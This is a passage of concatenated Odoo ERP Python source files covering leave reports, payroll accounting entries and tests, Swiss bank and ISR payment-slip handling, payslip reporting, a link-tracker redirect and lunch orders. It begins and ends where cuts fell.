request.holiday_status_id as holiday_status_id,
request.state as state,
request.holiday_type,
request.date_from as date_from,
request.date_to as date_to,
request.payslip_status as payslip_status,
'request' as type
from hr_leave as request) leaves
);
""")
def _read_from_database(self, field_names, inherited_field_names=[]):
if 'name' in field_names and 'employee_id' not in field_names:
field_names.append('employee_id')
super(LeaveReport, self)._read_from_database(field_names, inherited_field_names)
if 'name' in field_names:
if self.user_has_groups('hr_holidays.group_hr_holidays_user'):
return
current_employee = self.env['hr.employee'].sudo().search([('user_id', '=', self.env.uid)], limit=1)
for record in self:
emp_id = record._cache.get('employee_id', [False])[0]
if emp_id != current_employee.id:
try:
record._cache['name']
record._cache['name'] = '*****'
except Exception:
# skip SpecialValue (e.g. for missing record or access right)
pass
```
#### File: hr_payroll_account/models/hr_payroll_account.py
```python
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.tools import float_compare, float_is_zero
class HrPayslipLine(models.Model):
_inherit = 'hr.payslip.line'
def _get_partner_id(self, credit_account):
"""
Get partner_id of slip line to use in account_move_line
"""
# use partner of salary rule or fallback on employee's address
register_partner_id = self.salary_rule_id.register_id.partner_id
partner_id = register_partner_id.id or self.slip_id.employee_id.address_home_id.id
if credit_account:
if register_partner_id or self.salary_rule_id.account_credit.internal_type in ('receivable', 'payable'):
return partner_id
else:
if register_partner_id or self.salary_rule_id.account_debit.internal_type in ('receivable', 'payable'):
return partner_id
return False
class HrPayslip(models.Model):
_inherit = 'hr.payslip'
date = fields.Date('Date Account', states={'draft': [('readonly', False)]}, readonly=True,
help="Keep empty to use the period of the validation(Payslip) date.")
journal_id = fields.Many2one('account.journal', 'Salary Journal', readonly=True, required=True,
states={'draft': [('readonly', False)]}, default=lambda self: self.env['account.journal'].search([('type', '=', 'general')], limit=1))
move_id = fields.Many2one('account.move', 'Accounting Entry', readonly=True, copy=False)
@api.model
def create(self, vals):
if 'journal_id' in self.env.context:
vals['journal_id'] = self.env.context.get('journal_id')
return super(HrPayslip, self).create(vals)
@api.onchange('contract_id')
def onchange_contract(self):
super(HrPayslip, self).onchange_contract()
self.journal_id = self.contract_id.journal_id.id or (not self.contract_id and self.default_get(['journal_id'])['journal_id'])
@api.multi
def action_payslip_cancel(self):
moves = self.mapped('move_id')
moves.filtered(lambda x: x.state == 'posted').button_cancel()
moves.unlink()
return super(HrPayslip, self).action_payslip_cancel()
@api.multi
def action_payslip_done(self):
res = super(HrPayslip, self).action_payslip_done()
for slip in self:
line_ids = []
debit_sum = 0.0
credit_sum = 0.0
date = slip.date or slip.date_to
currency = slip.company_id.currency_id or slip.journal_id.company_id.currency_id
name = _('Payslip of %s') % (slip.employee_id.name)
move_dict = {
'narration': name,
'ref': slip.number,
'journal_id': slip.journal_id.id,
'date': date,
}
for line in slip.details_by_salary_rule_category:
amount = currency.round(slip.credit_note and -line.total or line.total)
if currency.is_zero(amount):
continue
debit_account_id = line.salary_rule_id.account_debit.id
credit_account_id = line.salary_rule_id.account_credit.id
if debit_account_id:
debit_line = (0, 0, {
'name': line.name,
'partner_id': line._get_partner_id(credit_account=False),
'account_id': debit_account_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': amount > 0.0 and amount or 0.0,
'credit': amount < 0.0 and -amount or 0.0,
'analytic_account_id': line.salary_rule_id.analytic_account_id.id or slip.contract_id.analytic_account_id.id,
'tax_line_id': line.salary_rule_id.account_tax_id.id,
})
line_ids.append(debit_line)
debit_sum += debit_line[2]['debit'] - debit_line[2]['credit']
if credit_account_id:
credit_line = (0, 0, {
'name': line.name,
'partner_id': line._get_partner_id(credit_account=True),
'account_id': credit_account_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': amount < 0.0 and -amount or 0.0,
'credit': amount > 0.0 and amount or 0.0,
'analytic_account_id': line.salary_rule_id.analytic_account_id.id or slip.contract_id.analytic_account_id.id,
'tax_line_id': line.salary_rule_id.account_tax_id.id,
})
line_ids.append(credit_line)
credit_sum += credit_line[2]['credit'] - credit_line[2]['debit']
if currency.compare_amounts(credit_sum, debit_sum) == -1:
acc_id = slip.journal_id.default_credit_account_id.id
if not acc_id:
raise UserError(_('The Expense Journal "%s" has not properly configured the Credit Account!') % (slip.journal_id.name))
adjust_credit = (0, 0, {
'name': _('Adjustment Entry'),
'partner_id': False,
'account_id': acc_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': 0.0,
'credit': currency.round(debit_sum - credit_sum),
})
line_ids.append(adjust_credit)
elif currency.compare_amounts(debit_sum, credit_sum) == -1:
acc_id = slip.journal_id.default_debit_account_id.id
if not acc_id:
raise UserError(_('The Expense Journal "%s" has not properly configured the Debit Account!') % (slip.journal_id.name))
adjust_debit = (0, 0, {
'name': _('Adjustment Entry'),
'partner_id': False,
'account_id': acc_id,
'journal_id': slip.journal_id.id,
'date': date,
'debit': currency.round(credit_sum - debit_sum),
'credit': 0.0,
})
line_ids.append(adjust_debit)
move_dict['line_ids'] = line_ids
move = self.env['account.move'].create(move_dict)
slip.write({'move_id': move.id, 'date': date})
move.post()
return res
class HrSalaryRule(models.Model):
_inherit = 'hr.salary.rule'
analytic_account_id = fields.Many2one('account.analytic.account', 'Analytic Account')
account_tax_id = fields.Many2one('account.tax', 'Tax')
account_debit = fields.Many2one('account.account', 'Debit Account', domain=[('deprecated', '=', False)])
account_credit = fields.Many2one('account.account', 'Credit Account', domain=[('deprecated', '=', False)])
class HrContract(models.Model):
_inherit = 'hr.contract'
_description = 'Employee Contract'
analytic_account_id = fields.Many2one('account.analytic.account', 'Analytic Account')
journal_id = fields.Many2one('account.journal', 'Salary Journal')
class HrPayslipRun(models.Model):
_inherit = 'hr.payslip.run'
journal_id = fields.Many2one('account.journal', 'Salary Journal', states={'draft': [('readonly', False)]}, readonly=True,
required=True, default=lambda self: self.env['account.journal'].search([('type', '=', 'general')], limit=1))
```
#### File: hr_payroll_account/tests/test_hr_payroll_account.py
```python
import time
from datetime import datetime, timedelta
from dateutil import relativedelta
from odoo import fields, tools
from odoo.modules.module import get_module_resource
from odoo.tests import common
class TestHrPayrollAccount(common.TransactionCase):
def _load(self, module, *args):
tools.convert_file(
self.cr, 'hr_payroll_account',
get_module_resource(module, *args), {}, 'init', False, 'test', self.registry._assertion_report)
def setUp(self):
super(TestHrPayrollAccount, self).setUp()
self._load('account', 'test', 'account_minimal_test.xml')
self.payslip_action_id = self.ref('hr_payroll.menu_department_tree')
self.res_partner_bank = self.env['res.partner.bank'].create({
'acc_number': '001-9876543-21',
'partner_id': self.ref('base.res_partner_12'),
'acc_type': 'bank',
'bank_id': self.ref('base.res_bank_1'),
})
self.hr_employee_john = self.env['hr.employee'].create({
'address_home_id': self.ref('base.res_partner_address_2'),
'address_id': self.ref('base.res_partner_address_27'),
'birthday': '1984-05-01',
'children': 0.0,
'country_id': self.ref('base.in'),
'department_id': self.ref('hr.dep_rd'),
'gender': 'male',
'marital': 'single',
'name': 'John',
'bank_account_id': self.res_partner_bank.bank_id.id,
})
self.hr_structure_softwaredeveloper = self.env['hr.payroll.structure'].create({
'name': 'Salary Structure for Software Developer',
'code': 'SD',
'company_id': self.ref('base.main_company'),
'parent_id': self.ref('hr_payroll.structure_base'),
'rule_ids': [(6, 0, [
self.ref('hr_payroll.hr_salary_rule_houserentallowance1'),
self.ref('hr_payroll.hr_salary_rule_convanceallowance1'),
self.ref('hr_payroll.hr_salary_rule_professionaltax1'),
self.ref('hr_payroll.hr_salary_rule_providentfund1'),
self.ref('hr_payroll.hr_salary_rule_meal_voucher'),
self.ref('hr_payroll.hr_salary_rule_sales_commission')
])],
})
# Create account journal.
self.hr_contract_john = self.env['hr.contract'].create({
'date_end': fields.Date.to_string(datetime.now() + timedelta(days=365)),
'date_start': fields.Date.today(),
'name': '<NAME> John',
'wage': 5000.0,
'type_id': self.ref('hr_contract.hr_contract_type_emp'),
'employee_id': self.hr_employee_john.id,
'struct_id': self.hr_structure_softwaredeveloper.id,
'journal_id': self.ref('hr_payroll_account.expenses_journal'),
})
self.hr_payslip = self.env['hr.payslip'].create({
'employee_id': self.hr_employee_john.id,
'journal_id': self.ref('hr_payroll_account.expenses_journal'),
})
def test_00_hr_payslip(self):
""" checking the process of payslip. """
date_from = time.strftime('%Y-%m-01')
date_to = str(datetime.now() + relativedelta.relativedelta(months=+1, day=1, days=-1))[:10]
res = self.hr_payslip.onchange_employee_id(date_from, date_to, self.hr_employee_john.id)
vals = {
'struct_id': res['value']['struct_id'],
'contract_id': res['value']['contract_id'],
'name': res['value']['name'],
}
vals['worked_days_line_ids'] = [(0, 0, i) for i in res['value']['worked_days_line_ids']]
vals['input_line_ids'] = [(0, 0, i) for i in res['value']['input_line_ids']]
vals.update({'contract_id': self.hr_contract_john.id})
self.hr_payslip.write(vals)
# I assign the amount to Input data.
payslip_input = self.env['hr.payslip.input'].search([('payslip_id', '=', self.hr_payslip.id)])
payslip_input.write({'amount': 5.0})
# I verify the payslip is in draft state.
self.assertEqual(self.hr_payslip.state, 'draft', 'State not changed!')
# I click on "Compute Sheet" button.
context = {"lang": "en_US", "tz": False, "active_model": 'hr.payslip', "department_id": False, "active_ids": [self.payslip_action_id], "section_id": False, "active_id": self.payslip_action_id}
self.hr_payslip.with_context(context).compute_sheet()
# I want to check cancel button. So I first cancel the sheet then make it set to draft.
self.hr_payslip.action_payslip_cancel()
self.assertEqual(self.hr_payslip.state, 'cancel', "Payslip is rejected.")
self.hr_payslip.action_payslip_draft()
# Confirm Payslip
self.hr_payslip.action_payslip_done()
# I verify that the Accounting Entries are created.
self.assertTrue(self.hr_payslip.move_id, 'Accounting Entries has not been created')
# I verify that the payslip is in done state.
self.assertEqual(self.hr_payslip.state, 'done', 'State not changed!')
```
#### File: hr_payroll_account/wizard/hr_payroll_payslips_by_employees.py
```python
from odoo import api, models
class HrPayslipEmployees(models.TransientModel):
_inherit = 'hr.payslip.employees'
@api.multi
def compute_sheet(self):
journal_id = False
if self.env.context.get('active_id'):
journal_id = self.env['hr.payslip.run'].browse(self.env.context.get('active_id')).journal_id.id
return super(HrPayslipEmployees, self.with_context(journal_id=journal_id)).compute_sheet()
```
#### File: hr_recruitment/models/hr_department.py
```python
from odoo import api, fields, models
class HrDepartment(models.Model):
_inherit = 'hr.department'
new_applicant_count = fields.Integer(
compute='_compute_new_applicant_count', string='New Applicant')
new_hired_employee = fields.Integer(
compute='_compute_recruitment_stats', string='New Hired Employee')
expected_employee = fields.Integer(
compute='_compute_recruitment_stats', string='Expected Employee')
@api.multi
def _compute_new_applicant_count(self):
applicant_data = self.env['hr.applicant'].read_group(
[('department_id', 'in', self.ids), ('stage_id.sequence', '<=', '1')],
['department_id'], ['department_id'])
result = dict((data['department_id'][0], data['department_id_count']) for data in applicant_data)
for department in self:
department.new_applicant_count = result.get(department.id, 0)
@api.multi
def _compute_recruitment_stats(self):
job_data = self.env['hr.job'].read_group(
[('department_id', 'in', self.ids)],
['no_of_hired_employee', 'no_of_recruitment', 'department_id'], ['department_id'])
new_emp = dict((data['department_id'][0], data['no_of_hired_employee']) for data in job_data)
expected_emp = dict((data['department_id'][0], data['no_of_recruitment']) for data in job_data)
for department in self:
department.new_hired_employee = new_emp.get(department.id, 0)
department.expected_employee = expected_emp.get(department.id, 0)
```
#### File: l10n_ch/models/res_bank.py
```python
import re
from odoo import api, fields, models, _
from odoo.tools.misc import mod10r
import werkzeug.urls
def _is_l10n_ch_postal(account_ref):
""" Returns True iff the string account_ref is a valid postal account number,
i.e. it only contains ciphers and is last cipher is the result of a recursive
modulo 10 operation ran over the rest of it. Shorten form with - is also accepted.
"""
if re.match('^[0-9]{2}-[0-9]{1,6}-[0-9]$', account_ref or ''):
ref_subparts = account_ref.split('-')
account_ref = ref_subparts[0] + ref_subparts[1].rjust(6,'0') + ref_subparts[2]
if re.match('\d+$', account_ref or ''):
account_ref_without_check = account_ref[:-1]
return mod10r(account_ref_without_check) == account_ref
return False
class ResBank(models.Model):
_inherit = 'res.bank'
l10n_ch_postal_chf = fields.Char(string='CHF ISR reference', help='The postal reference of the bank, used to generate ISR payment slips in CHF.')
l10n_ch_postal_eur = fields.Char(string='EUR ISR reference', help='The postal reference of the bank, used to generate ISR payment slips in EUR.')
class ResPartnerBank(models.Model):
_inherit = 'res.partner.bank'
l10n_ch_postal = fields.Char(string='ISR reference', help='The ISR number of the company within the bank')
@api.model
def _get_supported_account_types(self):
rslt = super(ResPartnerBank, self)._get_supported_account_types()
rslt.append(('postal', _('Postal')))
return rslt
@api.model
def retrieve_acc_type(self, acc_number):
""" Overridden method enabling the recognition of swiss postal bank
account numbers.
"""
if _is_l10n_ch_postal(acc_number):
return 'postal'
else:
return super(ResPartnerBank, self).retrieve_acc_type(acc_number)
@api.onchange('acc_number')
def _onchange_set_l10n_ch_postal(self):
if self.acc_type == 'iban':
self.l10n_ch_postal = self._retrieve_l10n_ch_postal(self.sanitized_acc_number)
else:
self.l10n_ch_postal = self.sanitized_acc_number
@api.model
def _retrieve_l10n_ch_postal(self, iban):
""" Reads a swiss postal account number from a an IBAN and returns it as
a string. Returns None if no valid postal account number was found, or
the given iban was not from Switzerland.
"""
if iban[:2] == 'CH':
#the IBAN corresponds to a swiss account
if _is_l10n_ch_postal(iban[-12:]):
return iban[-12:]
return None
def find_number(self, s):
# this regex match numbers like 1bis 1a
lmo = re.findall('([0-9]+[^ ]*)',s)
# no number found
if len(lmo) == 0:
return ''
# Only one number or starts with a number return the first one
if len(lmo) == 1 or re.match(r'^\s*([0-9]+[^ ]*)',s):
return lmo[0]
# else return the last one
if len(lmo) > 1:
return lmo[-1]
else:
return ''
@api.model
def build_swiss_code_url(self, amount, currency, date_due, debitor, ref_type, reference, comment):
communication = ""
if comment:
communication = (comment[:137] + '...') if len(comment) > 140 else comment
t_street_comp = '%s %s' % (self.company_id.street if (self.company_id.street != False) else '', self.company_id.street2 if (self.company_id.street2 != False) else '')
t_street_deb = '%s %s' % (debitor.street if (debitor.street != False) else '', debitor.street2 if (debitor.street2 != False) else '')
number = self.find_number(t_street_comp)
number_deb = self.find_number(t_street_deb)
if (t_street_comp == ' '):
t_street_comp = False
if (t_street_deb == ' '):
t_street_deb = False
qr_code_string = 'SPC\n0100\n1\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s' % (
self.acc_number,
self.company_id.name,
t_street_comp,
number,
self.company_id.zip,
self.company_id.city,
self.company_id.country_id.code,
amount,
currency,
date_due,
debitor.name,
t_street_deb,
number_deb,
debitor.zip,
debitor.city,
debitor.country_id.code,
ref_type,
reference,
communication)
qr_code_url = '/report/barcode/?type=%s&value=%s&width=%s&height=%s&humanreadable=1' % ('QR', werkzeug.url_quote_plus(qr_code_string), 256, 256)
return qr_code_url
@api.model
def validate_swiss_code_arguments(self, currency, debitor):
t_street_comp = '%s %s' % (self.company_id.street if (self.company_id.street != False) else '', self.company_id.street2 if (self.company_id.street2 != False) else '')
t_street_deb = '%s %s' % (debitor.street if (debitor.street != False) else '', debitor.street2 if (debitor.street2 != False) else '')
number = self.find_number(t_street_comp)
number_deb = self.find_number(t_street_deb)
if (t_street_comp == ' '):
t_street_comp = False
if (t_street_deb == ' '):
t_street_deb = False
if(currency.name == 'EUR'):
return (self.bank_id.l10n_ch_postal_eur and
self.company_id.zip and
self.company_id.city and
self.company_id.country_id.code and
(t_street_comp != False) and
(t_street_deb != False) and
debitor.zip and
debitor.city and
debitor.country_id.code and
(number != False) and (number_deb != False))
elif(currency.name == 'CHF'):
return (self.bank_id.l10n_ch_postal_chf and
self.company_id.zip and
self.company_id.city and
self.company_id.country_id.code and
(t_street_comp != False) and
(t_street_deb != False) and
debitor.zip and
debitor.city and
debitor.country_id.code and
(number != False) and (number_deb != False))
else:
return False
```
#### File: l10n_ch/tests/test_l10n_ch_isr.py
```python
import time
from odoo.addons.account.tests.account_test_classes import AccountingTestCase
from odoo.exceptions import ValidationError
from odoo.tests import tagged
@tagged('post_install', '-at_install')
class ISRTest(AccountingTestCase):
def create_invoice(self, currency_to_use='base.CHF'):
""" Generates a test invoice """
account_receivable = self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_receivable').id)], limit=1)
currency = self.env.ref(currency_to_use)
partner_agrolait = self.env.ref("base.res_partner_2")
product = self.env.ref("product.product_product_4")
account_revenue = self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_revenue').id)], limit=1)
invoice = self.env['account.invoice'].create({
'partner_id': partner_agrolait.id,
'currency_id': currency.id,
'name': 'invoice to client',
'account_id': account_receivable.id,
'type': 'out_invoice',
'date_invoice': time.strftime('%Y') + '-12-22',
})
self.env['account.invoice.line'].create({
'product_id': product.id,
'quantity': 1,
'price_unit': 42,
'invoice_id': invoice.id,
'name': 'something',
'account_id': account_revenue.id,
})
invoice.action_invoice_open()
return invoice
def create_account(self, number):
""" Generates a test res.partner.bank. """
return self.env['res.partner.bank'].create({
'acc_number': number
})
def print_isr(self, invoice):
try:
invoice.isr_print()
return True
except ValidationError:
return False
def isr_not_generated(self, invoice):
""" Prints the given invoice and tests that no ISR generation is triggered. """
self.assertFalse(self.print_isr(invoice), 'No ISR should be generated for this invoice')
def isr_generated(self, invoice):
""" Prints the given invoice and tests that an ISR generation is triggered. """
self.assertTrue(self.print_isr(invoice), 'An ISR should have been generated')
def test_l10n_ch_postals(self):
#An account whose number is set to a valid postal number becomes a 'postal'
#account and sets its postal reference field.
account_test_postal_ok = self.create_account('010391391')
self.assertEqual(account_test_postal_ok.acc_type, 'postal', "A valid postal number in acc_number should set its type to 'postal'")
self.assertEqual(account_test_postal_ok.l10n_ch_postal, '010391391', "A postal account should have a postal reference identical to its account number")
#An account whose number is set to a non-postal value should not get the
#'postal' type
account_test_postal_wrong = self.create_account('010391394')
self.assertNotEqual(account_test_postal_wrong.acc_type, 'postal', "A non-postal account cannot be of type 'postal'")
#A swiss IBAN account contains a postal reference
account_test_iban_ok = self.create_account('CH6309000000250097798')
self.assertEqual(account_test_iban_ok.acc_type, 'iban', "The IBAN must be valid")
self.assertEqual(account_test_iban_ok.l10n_ch_postal, '000250097798', "A valid swiss IBAN should set the postal reference")
#A non-swiss IBAN must not allow the computation of a postal reference
account_test_iban_wrong = self.create_account('GR1601101250000000012300695')
self.assertEqual(account_test_iban_wrong.acc_type, 'iban', "The IBAN must be valid")
self.assertFalse(account_test_iban_wrong.l10n_ch_postal, "A valid swiss IBAN should set the postal reference")
def test_isr(self):
#Let us test the generation of an ISR for an invoice, first by showing an
#ISR report is only generated when Odoo has all the data it needs.
invoice_1 = self.create_invoice('base.CHF')
self.isr_not_generated(invoice_1)
#Now we add an account for payment to our invoice, but still cannot generate the ISR
test_account = self.create_account('250097798')
invoice_1.partner_bank_id = test_account
self.isr_not_generated(invoice_1)
#Finally, we add bank coordinates to our account. The ISR should now be available to generate
test_bank = self.env['res.bank'].create({
'name':'Money Drop',
'l10n_ch_postal_chf':'010391391'
})
test_account.bank_id = test_bank
self.isr_generated(invoice_1)
#Now, let us show that, with the same data, an invoice in euros does not generate any ISR (because the bank does not have any EUR postal reference)
invoice_2 = self.create_invoice('base.EUR')
invoice_2.partner_bank_id = test_account
self.isr_not_generated(invoice_2)
```
#### File: l10n_in_hr_payroll/report/payslip_report.py
```python
from odoo import api, fields, models
from odoo.tools.sql import drop_view_if_exists
class PayslipReport(models.Model):
_name = "payslip.report"
_description = "Payslip Analysis"
_auto = False
name = fields.Char(readonly=True)
date_from = fields.Date(string='Date From', readonly=True)
date_to = fields.Date(string='Date To', readonly=True)
year = fields.Char(size=4, readonly=True)
month = fields.Selection([('01', 'January'), ('02', 'February'), ('03', 'March'), ('04', 'April'),
('05', 'May'), ('06', 'June'), ('07', 'July'), ('08', 'August'), ('09', 'September'),
('10', 'October'), ('11', 'November'), ('12', 'December')], readonly=True)
day = fields.Char(size=128, readonly=True)
state = fields.Selection([
('draft', 'Draft'),
('done', 'Done'),
('cancel', 'Rejected'),
], string='Status', readonly=True)
employee_id = fields.Many2one('hr.employee', string='Employee', readonly=True)
nbr = fields.Integer(string='# Payslip lines', readonly=True)
number = fields.Char(readonly=True)
struct_id = fields.Many2one('hr.payroll.structure', string='Structure', readonly=True)
company_id = fields.Many2one('res.company', string='Company', readonly=True)
paid = fields.Boolean(string='Made Payment Order ? ', readonly=True)
total = fields.Float(readonly=True)
category_id = fields.Many2one('hr.salary.rule.category', string='Category', readonly=True)
@api.model_cr
def init(self):
drop_view_if_exists(self.env.cr, self._table)
self.env.cr.execute("""
create or replace view payslip_report as (
select
min(l.id) as id,
l.name,
p.struct_id,
p.state,
p.date_from,
p.date_to,
p.number,
p.company_id,
p.paid,
l.category_id,
l.employee_id,
sum(l.total) as total,
to_char(p.date_from, 'YYYY') as year,
to_char(p.date_from, 'MM') as month,
to_char(p.date_from, 'YYYY-MM-DD') as day,
to_char(p.date_to, 'YYYY') as to_year,
to_char(p.date_to, 'MM') as to_month,
to_char(p.date_to, 'YYYY-MM-DD') as to_day,
1 AS nbr
from
hr_payslip as p
left join hr_payslip_line as l on (p.id=l.slip_id)
where
l.employee_id IS NOT NULL
group by
p.number,l.name,p.date_from,p.date_to,p.state,p.company_id,p.paid,
l.employee_id,p.struct_id,l.category_id
)
""")
```
#### File: l10n_in_hr_payroll/wizard/hr_yearly_salary_detail.py
```python
from odoo import api, fields, models
class YearlySalaryDetail(models.TransientModel):
_name = 'yearly.salary.detail'
_description = 'Hr Salary Employee By Category Report'
def _get_default_date_from(self):
year = fields.Date.from_string(fields.Date.today()).strftime('%Y')
return '{}-01-01'.format(year)
def _get_default_date_to(self):
date = fields.Date.from_string(fields.Date.today())
return date.strftime('%Y') + '-' + date.strftime('%m') + '-' + date.strftime('%d')
employee_ids = fields.Many2many('hr.employee', 'payroll_emp_rel', 'payroll_id', 'employee_id', string='Employees', required=True)
date_from = fields.Date(string='Start Date', required=True, default=_get_default_date_from)
date_to = fields.Date(string='End Date', required=True, default=_get_default_date_to)
@api.multi
def print_report(self):
"""
To get the date and print the report
@return: return report
"""
self.ensure_one()
data = {'ids': self.env.context.get('active_ids', [])}
res = self.read()
res = res and res[0] or {}
data.update({'form': res})
return self.env.ref('l10n_in_hr_payroll.action_report_hryearlysalary').report_action(self, data=data)
```
#### File: link_tracker/controller/main.py
```python
import werkzeug
from odoo import http
from odoo.http import request
class LinkTracker(http.Controller):
@http.route('/r/<string:code>', type='http', auth='none', website=True)
def full_url_redirect(self, code, **post):
country_code = request.session.geoip and request.session.geoip.get('country_code') or False
request.env['link.tracker.click'].add_click(code, request.httprequest.remote_addr, country_code, stat_id=False)
redirect_url = request.env['link.tracker'].get_url_from_code(code)
return werkzeug.utils.redirect(redirect_url or '', 301)
```
#### File: lunch/models/lunch.py
```python
from collections import OrderedDict
import json
import datetime
from odoo import api, fields, models, _
from odoo.exceptions import AccessError, ValidationError
from odoo.addons import decimal_precision as dp
from odoo.osv import expression
class LunchOrder(models.Model):
"""
A lunch order contains one or more lunch order line(s). It is associated to a user for a given
date. When creating a lunch order, applicable lunch alerts are displayed.
"""
_name = 'lunch.order'
_description = 'Lunch Order'
_order = 'date desc'
def _default_previous_order_ids(self):
prev_order = self.env['lunch.order.line'].search([('user_id', '=', self.env.uid), ('product_id.active', '!=', False)], limit=20, order='id desc')
# If we return return prev_order.ids, we will have duplicates (identical orders).
# Therefore, this following part removes duplicates based on product_id and note.
return list({
(order.product_id, order.note): order.id
for order in prev_order
}.values())
user_id = fields.Many2one('res.users', 'User', readonly=True,
states={'new': [('readonly', False)]},
default=lambda self: self.env.uid)
date = fields.Date('Date', required=True, readonly=True,
states={'new': [('readonly', False)]},
default=fields.Date.context_today)
order_line_ids = fields.One2many('lunch.order.line', 'order_id', 'Products',
readonly=True, copy=True,
states={'new': [('readonly', False)], False: [('readonly', False)]})
total = fields.Float(compute='_compute_total', string="Total", store=True)
state = fields.Selection([('new', 'New'),
('confirmed', 'Received'),
('cancelled', 'Cancelled')],
'Status', readonly=True, index=True, copy=False,
compute='_compute_order_state', store=True)
alerts = fields.Text(compute='_compute_alerts_get', string="Alerts")
company_id = fields.Many2one('res.company', related='user_id.company_id', store=True, readonly=False)
currency_id = fields.Many2one('res.currency', related='company_id.currency_id', readonly=True, store=True)
cash_move_balance = fields.Monetary(compute='_compute_cash_move_balance', multi='cash_move_balance')
balance_visible = fields.Boolean(compute='_compute_cash_move_balance', multi='cash_move_balance')
previous_order_ids = fields.Many2many('lunch.order.line', compute='_compute_previous_order')
previous_order_widget = fields.Text(compute='_compute_previous_order')
@api.one
@api.depends('order_line_ids')
def _compute_total(self):
"""
get and sum the order lines' price
"""
self.total = sum(
orderline.price for orderline in self.order_line_ids)
@api.multi
def name_get(self):
return [(order.id, '%s %s' % (_('Lunch Order'), '#%d' % order.id)) for order in self]
@api.depends('state')
def _compute_alerts_get(self):
"""
get the alerts to display on the order form
"""
alert_msg = [alert.message
for alert in self.env['lunch.alert'].search([])
if alert.display]
if self.state == 'new':
self.alerts = alert_msg and '\n'.join(alert_msg) or False
@api.multi
@api.depends('user_id', 'state')
def _compute_previous_order(self):
self.ensure_one()
self.previous_order_widget = json.dumps(False)
prev_order = self.env['lunch.order.line'].search([('user_id', '=', self.env.uid), ('product_id.active', '!=', False)], limit=20, order='date desc, id desc')
# If we use prev_order.ids, we will have duplicates (identical orders).
# Therefore, this following part removes duplicates based on product_id and note.
self.previous_order_ids = list({
(order.product_id, order.note): order.id
for order in prev_order
}.values())
if self.previous_order_ids:
lunch_data = {}
for line in self.previous_order_ids:
lunch_data[line.id] = {
'line_id': line.id,
'product_id': line.product_id.id,
'product_name': line.product_id.name,
'supplier': line.supplier.name,
'note': line.note,
'price': line.price,
'date': fields.Date.to_string(line.date),
'currency_id': line.currency_id.id,
}
# sort the old lunch orders by (date, id)
lunch_data = OrderedDict(sorted(lunch_data.items(), key=lambda t: (t[1]['date'], t[0]), reverse=True))
self.previous_order_widget = json.dumps(lunch_data)
@api.one
@api.depends('user_id')
def _compute_cash_move_balance(self):
domain = [('user_id', '=', self.user_id.id)]
lunch_cash = self.env['lunch.cashmove'].read_group(domain, ['amount', 'user_id'], ['user_id'])
if len(lunch_cash):
self.cash_move_balance = lunch_cash[0]['amount']
self.balance_visible = (self.user_id == self.env.user) or self.user_has_groups('lunch.group_lunch_manager')
@api.one
@api.constrains('date')
def _check_date(self):
"""
Prevents the user to create an order in the past
"""
date_order = self.date
date_today = fields.Date.context_today(self)
if date_order < date_today:
raise ValidationError(_('The date of your order is in the past.'))
@api.one
@api.depends('order_line_ids.state')
def _compute_order_state(self):
"""
Update the state of lunch.order based on its orderlines. Here is the logic:
- if at least one order line is cancelled, the order is set as cancelled
- if no line is cancelled but at least one line is not confirmed, the order is set as new
- if all lines are confirmed, the order is set as confirmed
"""
if not self.order_line_ids:
self.state = 'new'
else:
isConfirmed = True
for orderline in self.order_line_ids:
if orderline.state == 'cancelled':
self.state = 'cancelled'
return
elif orderline.state == 'confirmed':
continue
else:
isConfirmed = False
if isConfirmed:
self.state = 'confirmed'
else:
self.state = 'new'
return
class LunchOrderLine(models.Model):
_name = 'lunch.order.line'
_description = 'Lunch Order Line'
_order = 'date desc, id desc'
name = fields.Char(related='product_id.name', string="Product Name", readonly=True)
order_id = fields.Many2one('lunch.order', 'Order', ondelete='cascade', required=True)
product_id = fields.Many2one('lunch.product', 'Product', required=True,
domain=[('available', '=', True)])
category_id = fields.Many2one('lunch.product.category', string='Product Category',
related='product_id.category_id', readonly=True, store=True)
date = fields.Date(string='Date', related='order_id.date', readonly=True, store=True)
supplier = fields.Many2one('res.partner', string='Vendor', related='product_id.supplier',
readonly=True, store=True)
user_id = fields.Many2one('res.users', string='User', related='order_id.user_id',
readonly=True, store=True)
note = fields.Text('Note')
price = fields.Float(related='product_id.price', readonly=True, store=True,
digits=dp.get_precision('Account'))
state = fields.Selection([('new', 'New'),
('confirmed', 'Received'),
('ordered', 'Ordered'),
('cancelled', 'Cancelled')],
'Status', readonly=True, index=True, default='new')
cashmove = fields.One2many('lunch.cashmove', 'order_id', 'Cash Move')
currency_id = fields.Many2one('res.currency', related='order_id.currency_id', readonly=False)
def _check_supplier_availibility(self):
products = self.mapped('product_id')
if not all(product.available for product in products):
supplier_name = ", ".join(product.supplier.display_name for product in products if not product.available)
raise ValidationError(_("Vendor(s) '%s' is not available today") % supplier_name)
@api.model
def create(self, vals):
""" Override as an onchange would not apply if using the history buttons """
res = super(LunchOrderLine, self).create(vals)
res.with_context(lunch_date=res.order_id.date)._check_supplier_availibility()
return res
@api.multi
def write(self, vals):
""" Override as an onchange would not apply if using the history buttons """
res = super(LunchOrderLine, self).write(vals)
if vals.get('product_id'):
for line in self:
line.with_context(lunch_date=line.order_id.date)._check_supplier_availibility()
return res
def order(self):
"""
The order_line is ordered to the vendor but isn't received yet
"""
if self.user_has_groups("lunch.group_lunch_manager"):
self.write({'state': 'ordered'})
order = {
'supplier': False,
'company': False,
'currency': False,
}
group_lines = {}
for line in self:
if not line.supplier:
# do not send emails for products with no suppliers
continue
if order['supplier'] and line.supplier != order['supplier']:
raise ValidationError(_("Validate order for one supplier at a time to send emails (mixed orders from %s and %s)") % (
order['supplier'].display_name, line.supplier.display_name))
order['supplier'] = line.supplier
if order['company'] and line.order_id.company_id != order['company']:
raise ValidationError(_("Validate order for one company at a time to send emails (mixed orders from %s and %s)") % (
order['company'].name, line.order_id.company_id.name))
order['company'] = line.order_id.company_id
if order['currency'] and line.currency_id != order['currency']:
raise ValidationError(_("Validate order for one currency at a time to send emails (mixed orders from %s and %s)") % (
order['currency'].name, line.currency_id.name))
order['currency'] = line.currency_id
# group the order by products and note
key = (line.product_id, line.note)
group_lines.setdefault(key, 0)
